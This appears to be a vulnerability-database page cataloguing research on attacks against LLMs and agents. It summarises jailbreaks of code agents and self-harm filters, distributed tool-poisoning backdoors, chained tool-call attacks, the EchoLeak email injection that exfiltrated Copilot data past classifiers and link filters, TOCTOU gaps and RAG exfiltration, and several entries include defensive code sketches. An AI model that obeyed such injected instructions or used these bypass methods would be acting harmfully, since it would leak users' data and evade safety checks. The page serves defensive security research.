Data Security Vulnerabilities

Issues affecting data confidentiality and integrity

Related Vulnerabilities

81 entries

Code Agent Executable Jailbreaks

10/13/2025

AI code agents are vulnerable to jailbreaking attacks that cause them to generate or complete malicious code. The vulnerability is significantly amplified when a base Large Language Model (LLM) is integrated into an agentic framework that uses multi-step planning and tool-use. Initial safety refusals by the LLM are frequently overturned during subsequent planning or self-correction steps within the agent's reasoning loop.

Breaking the Code: Security Assessment of AI Code Agents Through Systematic Jailbreaking Attacks

Affects: gpt-4.1, gpt-o1, deepseek-r1, qwen3-235b, mistral large 2.1, llama-3.1-70b, llama-3-8b, claude-3.7-sonnet, dolphinmistral-24b-venice

Distributed Backdoor in Multi-Agent Systems

10/31/2025

A distributed backdoor vulnerability, named "Collaborative Shadows", exists in LLM-based Multi-Agent Systems (MAS) that rely on external or modifiable tools. An attacker poisons multiple agent tools by embedding inert, encrypted "attack primitives" in them; each primitive is a fragment of a larger malicious payload. A carefully crafted user instruction acts as both trigger and decryption key: it steers the agents to collaborate in a specific sequence, so that they invoke the poisoned tools in a predefined order and the encrypted primitives are released into the agents' observations and memory. After the task completes, the attacker can scan the execution trace or agent memories for the primitives, decrypt them using the initial instruction, and reassemble them to execute the full payload, for example to exfiltrate sensitive data processed by the agents. The attack exploits the inter-agent collaboration process itself. Because the backdoor is decentralized and its components are individually benign, it can evade detection by tools that inspect individual agents or tools only in isolation.

Collaborative Shadows: Distributed Backdoor Attacks in LLM-Based Multi-Agent Systems

Affects: qwen3-30b-a3b, glm-4.5-air, kimi-k2-instruct, gemini-2.5-pro, gpt-4.1

Chained Tool-Use Injections

10/13/2025

Tool-enabled Large Language Model (LLM) agents are vulnerable to Sequential Tool Attack Chaining (STAC), in which a sequence of individually benign tool calls is orchestrated to achieve a malicious outcome. An attacker guides the agent through a multi-turn interaction in which each step appears harmless in isolation. Safety mechanisms that evaluate individual prompts or actions fail to detect the threat because the malicious intent is distributed across the sequence and only becomes apparent from the cumulative effect of the entire tool chain, typically at the final execution step. This lets the attacker bypass safety guardrails and execute harmful actions in the agent's environment.

STAC: When Innocent Tools Form Dangerous Chains to Jailbreak LLM Agents

Affects: gpt-4.1-2025-04-14, gpt-4.1-mini-2025-04-14, qwen3-32b, llama-3.1-405b-instruct, llama3.3-70b-instruct, mistral-large-instruct-2411, mistral-small-3.2-24b-instruct-2506, magistral-small-2506, gpt-4.1
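
The gap between per-call and sequence-level checking described in the STAC entry above can be illustrated with a minimal sketch. It is not the method from the STAC paper: the tool names, the effect labels, and the forbidden combination are all hypothetical, chosen only to show how every call can pass an isolated check while the session as a whole does not.

```python
from dataclasses import dataclass, field

# Hypothetical effect labels for hypothetical tools (assumptions, not a real API).
TOOL_EFFECTS = {
    "read_customer_db": {"reads_sensitive"},
    "summarize": set(),
    "http_post": {"sends_external"},
}

# Hypothetical policy: these effects must never occur together in one session.
FORBIDDEN_COMBINATIONS = [frozenset({"reads_sensitive", "sends_external"})]


def call_allowed_in_isolation(tool: str) -> bool:
    """Per-call guard: looks at one tool call with no memory of earlier calls."""
    return tool in TOOL_EFFECTS


@dataclass
class SessionMonitor:
    """Sequence-level guard: accumulates effects across the whole tool chain."""

    seen_effects: set = field(default_factory=set)

    def permit(self, tool: str) -> bool:
        combined = self.seen_effects | TOOL_EFFECTS[tool]
        # Refuse the call if it would complete a forbidden combination.
        if any(combo <= combined for combo in FORBIDDEN_COMBINATIONS):
            return False
        self.seen_effects = combined
        return True


chain = ["read_customer_db", "summarize", "http_post"]
isolated = [call_allowed_in_isolation(t) for t in chain]
monitor = SessionMonitor()
cumulative = [monitor.permit(t) for t in chain]
```

Here `isolated` accepts all three calls, while `cumulative` refuses the last one, the step at which the chain's combined effect becomes visible. Real agents would need far richer effect tracking than static labels.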

Content Concretization Jailbreak

9/30/2025

A vulnerability, termed "Content Concretization," exists in Large Language Models (LLMs) wherein safety filters can be bypassed by iteratively refining a malicious request. The attack uses a less-constrained, lower-tier LLM to generate a preliminary draft (e.g., pseudocode or a non-executable prototype) of a malicious tool from an abstract prompt. This "concretized" draft is then passed to a more capable, higher-tier LLM. The higher-tier LLM, when prompted to refine or complete the existing draft, is significantly more likely to generate the full malicious, executable content than if it had received the initial abstract prompt directly. This exploits a weakness in safety alignment where models are more permissive in extending existing content compared to generating harmful content from scratch.

Jailbreaking Large Language Models Through Content Concretization

Affects: gpt-4o-mini, claude 3.7 sonnet, claude 3.5 sonnet, claude 3.5 haiku, gemini 2.5 flash preview, gemini 2.5 pro preview, gemini 2.0 flash, gpt-4.1o3, gpt-4o, gpt-o3, gpt-4

EchoLeak Zero-Click Data Exfiltration

9/30/2025

A zero-click indirect prompt injection vulnerability, CVE-2025-32711, existed in Microsoft 365 Copilot. A remote, unauthenticated attacker could exfiltrate sensitive data from a victim's session by sending a crafted email. When Copilot later processed this email as part of a user's query, hidden instructions caused it to retrieve sensitive data from the user's context (e.g., other emails, documents) and embed it into a URL. The attack chain involved bypassing Microsoft's XPIA prompt injection classifier, evading link redaction filters using reference-style Markdown, and abusing a trusted Microsoft Teams proxy domain to bypass the client-side Content Security Policy (CSP), resulting in automatic data exfiltration without any user interaction.

EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
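
One step of the EchoLeak chain above, evading link redaction with reference-style Markdown, can be sketched as an output scan that covers both link syntaxes. This is an illustrative sketch only, not Microsoft's filter: the regular expressions are simplified, and `ALLOWED_HOSTS` and `external_urls` are hypothetical names.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the assistant may link to (an assumption).
ALLOWED_HOSTS = {"intranet.example.com"}

# Inline form: [text](url) or ![alt](url)
INLINE = re.compile(r"!?\[[^\]]*\]\(\s*<?([^)\s>]+)")
# Reference definition form: [label]: url  (the URL lives on a separate line)
REF_DEF = re.compile(r"^[ ]{0,3}\[[^\]]+\]:\s*<?([^\s>]+)", re.MULTILINE)


def external_urls(markdown: str) -> list:
    """Return URLs in model output whose host is not on the allowlist."""
    flagged = []
    for url in INLINE.findall(markdown) + REF_DEF.findall(markdown):
        host = urlparse(url).hostname
        if host is not None and host not in ALLOWED_HOSTS:
            flagged.append(url)
    return flagged


output = (
    "Summary ready. ![status][ref]\n\n"
    "[ref]: https://attacker.example/c?d=secret\n"
)
flagged = external_urls(output)
```

A scan that applied only the `INLINE` pattern would find nothing in `output`, because the URL appears only in the reference definition. Note that, per the entry above, the real chain also abused a trusted proxy domain, so a host allowlist alone would not have been sufficient.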

LLM Agent TOCTOU Vulnerabilities

8/31/2025

A Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in LLM-enabled agentic systems that execute multi-step plans involving sequential tool calls. The vulnerability arises because plans are not executed atomically. An agent may perform a "check" operation (e.g., reading a file, checking a permission) in one tool call, and a subsequent "use" operation (e.g., writing to the file, performing a privileged action) in another tool call. A temporal gap between these calls, often used for LLM reasoning, allows an external process or attacker to modify the underlying resource state. This leads the agent to perform its "use" action on stale or manipulated data, resulting in unintended behavior, information disclosure, or security bypass.

Mind the Gap: Time-of-Check to Time-of-Use Vulnerabilities in LLM-Enabled Agents
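
The check/use gap in the TOCTOU entry above can be made concrete with a small sketch in which the "use" step re-validates the state observed at "check" time. This is one possible mitigation under simplifying assumptions, not the approach from the paper: the function names are hypothetical, and a content hash stands in for whatever state the agent actually inspected.

```python
import hashlib
import os
import tempfile


class StaleResourceError(RuntimeError):
    """Raised when a resource changed between the check and the use step."""


def fingerprint(path: str) -> str:
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def check_step(path: str) -> str:
    """The agent's "check" tool call: inspect the file and remember its state."""
    return fingerprint(path)


def use_step(path: str, expected: str, new_content: str) -> None:
    """The agent's "use" tool call: refuse to act if the state has drifted."""
    if fingerprint(path) != expected:
        raise StaleResourceError(f"{path} changed since it was checked")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(new_content)


def demo() -> bool:
    """Simulate an external write during the agent's reasoning gap."""
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "config.txt")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("mode=safe")
        token = check_step(path)
        # Another process modifies the file while the LLM is still planning.
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("mode=unsafe")
        try:
            use_step(path, token, "mode=safe\nverbose=1")
        except StaleResourceError:
            return True  # the stale "use" was blocked
        return False
```

Re-validation narrows the window but does not close it: the file can still change between the second fingerprint and the write. Fully closing the gap requires an atomic primitive such as a lock or a compare-and-swap operation provided by the underlying resource.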

Enterprise Multi-Turn Data Exfiltration

7/28/2025

Large Language Model (LLM) systems integrated with private enterprise data, such as those using Retrieval-Augmented Generation (RAG), are vulnerable to multi-stage prompt inference attacks. An attacker can use a sequence of individually benign-looking queries to incrementally extract confidential information from the LLM's context. Each query appears innocuous in isolation, bypassing safety filters designed to block single malicious prompts. By chaining these queries, the attacker can reconstruct sensitive data from internal documents, emails, or other private sources accessible to the LLM. The attack exploits the conversational context and the model's inability to recognize the cumulative intent of a prolonged, strategic dialogue.

Multi-Stage Prompt Inference Attacks on Enterprise LLM Systems

Affects: gpt-4, gpt-3, gpt-2, roberta, gemini

LLM Suicide Prompt Jailbreak

7/14/2025

Safety filters in Large Language Models (LLMs) that are designed to prevent generation of content related to self-harm and suicide can be bypassed through multi-step adversarial prompting. By reframing the request as an academic exercise or hypothetical scenario, a user can elicit detailed instructions and information that could facilitate self-harm or suicide, even after expressing harmful intent earlier in the conversation. The vulnerability lies in the filters' failure to consistently recognize and block harmful outputs when the conversational context shifts.

'For Argument's Sake, Show Me How to Harm Myself!': Jailbreaking LLMs in Suicide and Self-Harm Contexts

Affects: chat-gpt4o*, chat-gpt4o, perplexityai, gemini flash 2.0, claude 3.7 sonnet, pi ai

Stealthy Unlearning Degradation

6/30/2025

A vulnerability in fine-tuning-based large language model (LLM) unlearning allows malicious actors to craft manipulated forgetting requests. By subtly increasing the frequency of common benign tokens within the forgetting data, the attacker can cause the unlearned model to exhibit unintended unlearning behaviors when these benign tokens appear in normal user prompts, leading to a degradation of model utility for legitimate users. This occurs because existing unlearning methods fail to effectively distinguish between benign tokens and those truly related to the target knowledge being unlearned.

Keeping an Eye on LLM Unlearning: The Hidden Risk and Remedy

Affects: llama 3.1 (8b), mistral v0.3 (7b)
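
The manipulation in the unlearning entry above, raising the frequency of common benign tokens in the forgetting data, suggests a simple screening heuristic: compare token rates in a forgetting request against a reference corpus. The sketch below is an assumption for illustration and is not the remedy proposed in the paper. Whitespace tokenization, the `ratio` threshold, and the function names are all hypothetical.

```python
from collections import Counter


def token_rates(texts):
    """Relative frequency of each whitespace-separated token in the texts."""
    counts = Counter(tok for text in texts for tok in text.lower().split())
    total = sum(counts.values())
    return {tok: count / total for tok, count in counts.items()}


def overrepresented(forget_texts, reference_texts, common_tokens, ratio=2.0):
    """Common tokens whose rate in the forgetting data exceeds
    `ratio` times their rate in the reference corpus."""
    forget = token_rates(forget_texts)
    reference = token_rates(reference_texts)
    return sorted(
        tok
        for tok in common_tokens
        if tok in reference and forget.get(tok, 0.0) > ratio * reference[tok]
    )


reference_corpus = [
    "please tell me the capital of france",
    "please summarize the report",
]
forget_request = ["please please please forget the wizard story"]
suspicious = overrepresented(forget_request, reference_corpus, {"please", "the"})
```

In this toy data, "please" makes up 3 of 7 tokens in the forgetting request against 2 of 11 in the reference corpus, so it is flagged, while "the" is not. A subtle attacker could stay under any fixed threshold, so a check like this is at best a first-pass filter.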

Agent Red-Teaming via Fuzzing

7/14/2025

Large Language Model (LLM) agents are vulnerable to indirect prompt injection attacks through manipulation of external data sources accessed during task execution. Attackers can embed malicious instructions within this external data, causing the LLM agent to perform unintended actions, such as navigating to arbitrary URLs or revealing sensitive information. The vulnerability stems from insufficient sanitization and validation of external data before it's processed by the LLM.

AgentVigil: Generic Black-Box Red-teaming for Indirect Prompt Injection against LLM Agents

Affects: o3-mini, gpt-4o, gpt-4o-mini, claude-3.5-sonnet, gemini-2-flash-exp, llama3-8b